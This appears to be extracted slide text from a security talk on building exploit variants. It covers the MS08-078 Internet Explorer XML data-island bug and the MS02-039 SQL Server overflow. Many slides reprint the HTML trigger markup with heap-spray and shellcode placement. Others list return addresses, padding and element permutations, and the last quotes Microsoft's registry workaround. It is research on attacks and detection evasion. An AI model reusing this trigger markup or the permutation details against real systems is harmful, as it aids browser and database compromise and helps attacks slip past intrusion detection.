<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
93. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
94. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
95. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
96. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
97. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
98. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
99. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
100. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
eax ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
101. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
102. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
103. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
ecx (sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
104. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
105. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
0a
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
106. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC
Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
DATAFLD
0a0a0a
Data Consumer #02
XML Data Source Object #02
0x0a0a0a0a DATAFLD
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
107. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATAFLD
0x0a0a0a0a
Exploitation
shellcode
(sprayed into the heap)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
110. POPed MS02-039
• SQL Request: • JUMP:
– CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and
forward to REL8.
• SQL INSTANCENAME: – There are 115 possible values to REL8.
– ASCII hexa values from 0x01 to 0xff, except: – 115 permutations.
0x0a, 0x0d, , 0x2f, 0x3a and 0x5c.
– 24,000 permutations. • Writable address and memory alignment:
– There are 26,758 new writable addresses within
• Return address: SQLSORT.DLL (Microsoft SQL Server 2000
– Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable
case the ESP register. addresses if do not mind making it hardcoded.
– There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and
within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk.
2000 SP0/SP1/SP2). There are much more return – 26,758 permutations.
addresses if do not mind making it hardcoded.
– Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment:
Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff.
and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from
reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities.
2007).
– 29,210 permutations.
– 4 permutations.
115. POPed MS08-078
• XML Data Island: • Data Consumer (HTML elements):
– There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements
HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable
HTML document or overloading the HTML HTML elements available, but only five (5)
<SCRIPT> element. Unfortunately, the HTML elements are useful.
<SCRIPT> element is useless. – The HTML element is a key trigger, because it
points to a dereferenced XML DSO, but it does
• Data Source Object (DSO): not have to be the same HTML element to do so
– The HTML <XML> element holds a reference – it can be any mixed HTML element.
to a XML DSO, but a XML DSO can also be a – 25 permutations.
reference used by another HTML element:
• <OBJECT>. • Return address:
– The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the
to reference: XML DSO or Tabular Data XML DSO handles the return address, and can
Control (TDC). use “.NET DLL” technique by Mark Dowd and
– 4 permutations. Alexander Sotirov (“How to Impress Girls with
Browser Memory Protection Bypasses” – Black
Hat USA, 2008).
• Reference:
– There are, at least, four (4) new possible return
– Characters like “<” and “&” are illegal in <XML> addresses.
element. To avoid errors <XML> element can be
defined as CDATA (Unparsed Character Data). – 4 permutations.
But the <XML> element can be also defined as
“<” instead of “<”.
– Both <IMG SRC= > and <IMAGE SRC= >
elements are useful as a XML DSO.
– 4 permutations.
116. POPed MS08-078
• XML Data Island: • Data Consumer (HTML elements):
– There are two (2) options: using the Dynamic – According to MSDN (“Binding HTML Elements
HTML (DHTML) <XML> element within the to Data”) there are, at least, fifteen (15) bindable
HTML document or overloading the HTML HTML elements available, but only five (5)
<SCRIPT> element. Unfortunately, the HTML elements are useful.
<SCRIPT> element is useless. – The HTML element is a key trigger, because it
points to a dereferenced XML DSO, but it does
• Data Source Object (DSO): not have to be the same HTML element to do so
– The HTML <XML> element holds a reference – it can be any mixed HTML element.
to a XML DSO, but a XML DSO can also be a – 25 permutations.
reference used by another HTML element:
• <OBJECT>. • Return address:
– The HTML <OBJECT> element uses Class ID – Uses “Heap Spray” technique, in this case the
to reference: XML DSO or Tabular Data XML DSO handles the return address, and can
Control (TDC). use “.NET DLL” technique by Mark Dowd and
– 4 permutations. Alexander Sotirov (“How to Impress Girls with
Browser Memory Protection Bypasses” – Black
Hat USA, 2008).
• Reference:
– There are, at least, four (4) new possible return
– Characters like “<” and “&” are illegal in <XML> addresses.
element. To avoid errors <XML> element can be
defined as CDATA (Unparsed Character Data). – 4 permutations.
But the <XML> element can be also defined as
“<” instead of “<”.
– Both <IMG SRC= > and <IMAGE SRC= >
elements are useful as a XML DSO.
– 4 permutations.
117. POPed MS08-078
• Workarounds for Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844
…
– Disable XML Island functionality
• Create a backup copy of the registry keys by using the following command from an elevated command
prompt:
…
• Next, save the following to a file with a .REG extension, such as Disable_XML_Island.reg:
Windows Registry Editor Version 5.00
[-HKEY_CLASSES_ROOTCLSID{379E501F-B231-11D1-ADC1-00805FC752D8}]
• Run Disable_XML_Island.reg with the following command from an elevated command prompt:
Regedit.exe /s Disable_XML_Island.reg
550DDA30-0541-11D2-9CA9-0060B0EC3D39 (XML Data Source Object 1.0)
F5078F1F-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 2.6)
F5078F39-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 3.0)
F6D90F14-9C73-11D3-B32E-00C04F990BB4 (XML Data Source Object 3.0)
333C7BC4-460F-11D0-BC04-0080C7055A83 (Tabular Data Control)